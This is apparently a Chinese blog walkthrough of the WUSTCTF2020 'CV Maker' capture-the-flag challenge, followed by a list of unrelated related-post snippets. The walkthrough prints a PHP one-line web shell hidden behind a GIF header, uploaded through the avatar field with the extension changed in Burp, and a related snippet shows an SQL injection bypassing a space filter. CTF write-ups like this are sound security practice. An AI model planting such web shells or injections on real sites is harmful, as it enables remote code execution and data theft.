[WUSTCTF2020]CV Maker

打开环境

yvtuYG6gjNYy92RzX2vTX9NU8L2H-1kXH5izum-d7RA

注册了账号登陆，发现有上传头像的地方，尝试上传文件

Lt1u4UYVTexhRZ7mpQzTjW4wufK6J0RvgKIVJfp1ckU

可以上传图片马

GIF89a
<script language='php'> @eval($_POST['shell']);</script>

BP里抓包改为php，得到上传成功路径http://1d2ee33c-dfe2-49ec-88c3-d3305f7bd2f3.node5.buuoj.cn:81/uploads/d41d8cd98f00b204e9800998ecf8427e.php

L5urwvjjI6vVdNmkhUdeXabsFGkZgv6nzR4prCFw5ek

使用蚁剑连接

HfMSsRWxYMlsaVtNyVXKi4FODJS7afPTB4kq0fGuPK8

6jXwzvwbY5yGmpcle3TI2uSgondma-5pZQ0TKz3v1DE

根目录下发现flag文件，打开即可得到flag

tVmsjJY9os5X9cpkwXDjRbqywweCcujAc1vRokeXJFY

标签：WUSTCTF2020,CV,flag,php,上传,Maker
From： https://www.cnblogs.com/fishjumpriver/p/18172410

在下载opencv等类似的包时，需要注意到的一个大问题！
问题描述我尝试好多次去下载opencv-python的依赖包，发现一直说找不到这个东西问题解决查阅了好多资料，尝试了各种方法，发现还是同样的错误，然后突然看到一位博主说“是开了代理的缘故”；碰巧我也一直开着代理，关闭之后，再次使用清华源尝试下载opencv-python，发现没有再出现那个错误，并......
opencv中自定义的双线性二次插值的图像旋转及缩放
#include<iostream>#include<opencv2/opencv.hpp>usingnamespacecv;usingnamespacestd;voidcoordinateTransform(Point2d*p4Corner,Point2d*np4Corner,doublerotAngle,doublegamma,Point2dcenter){doublecx=center.x,cy=center.y;doubl......
macOS OpenCV报错：Undefined symbols for architecture x86_64
这个错误可能是链接的OpenCV库不对，我这里的情况是我代码使用的GCC编译器，但是通过brewinstallopencv安装的OpenCV是使用clang编译的，代码也使用clang编译器可以解决这个问题。要查看opencv的编译信息，可以使用这个命令opencv_version-v我这边输出Generalconfigurationfo......
openCV 图片转为base64
在Python中，使用OpenCV处理图片并将其转换为Base64编码的字符串可以通过以下步骤实现：使用OpenCV读取图片。使用cv2.imencode将图片转换为字节流。使用base64库将字节流编码为Base64字符串。以下是实现这一功能的示例代码：importcv2importnumpyasnpimportb......
opencv距离变换函数distanceTransform
当图像内的各个子图没有连接时，可以直接使用形态学的腐蚀操作确定前景对象，但是如果图像内的子图连接在一起时，就很难确定前景对象了。此时，借助于距离变换函数cv2.distanceTransform()可以方便地将前景对象提取出来。距离变换函数cv2.distanceTransform()计算二值图像内任意点到最......
[WUSTCTF2020]颜值成绩查询
[WUSTCTF2020]颜值成绩查询打开环境是一个成绩查询的页面1.手工注入输入1发现有admin的账号和得分输入1'会提示学号不存在1/**/or/**/1=1#过滤了空格1/**/order/**/by/**/3#存在1/**/order/**/by/**/4#不存在由此得知有3个字段1/**/union/**/select/**/1,2,......
Spring WebFlow 远程代码执行漏洞（CVE-2017-4971）
SpringWebFlow远程代码执行漏洞（CVE-2017-4971）SpringWebFlow是一个适用于开发基于流程的应用程序的框架（如购物逻辑），可以将流程的定义和实现流程行为的类和视图分离开来。在其2.4.x版本中，如果我们控制了数据绑定时的field，将导致一个SpEL表达式注入漏洞，最终造成任意命令执行。......
浅析OpenCV分水岭变换watershed函数的markers参数[C++]
0.前言本文是笔者在学习C++OpenCV库时学习心得，在学习分水岭变换函数时，由于缺少相关学习资料，导致笔者理解吃力，故写此文章阐述一下对该函数的理解，希望对其他学习人士提供帮助。本文主要介绍了watershed函数参数以及参数实际表示。请您按文章次序阅读。您需要提前了解的相关知......
openEuler操作系统安装OpenCV 3.4.10
安装依赖JDK要求需求java17系统要求centos8centos7需要自行升级glibc到某个版本，哪一个忘记了，风险很大，不要尝试！基础依赖#缺什么就下什么，其中cmake是最重要的yum-yinstallepel-releaseyuminstallgccgcc-c++yuminstallcmakeyuminstallepel-releaseyum......
Pacemaker常用命令
crmconfigureshow#查看配置信息说明：资源组名为zavipg，包含有zatest和vip01两个资源。vip为10.10.206.229，通过systemd监控zabbix_agentd服务，监控周期为3s，超时时间为15s，失败后置为状态standby；通过location配置资源约束，首选运行节点为centos20624，通过#uname识别 pcsstat......

[WUSTCTF2020]CV Maker

[WUSTCTF2020]CV Maker

相关文章

赞助商

阅读排行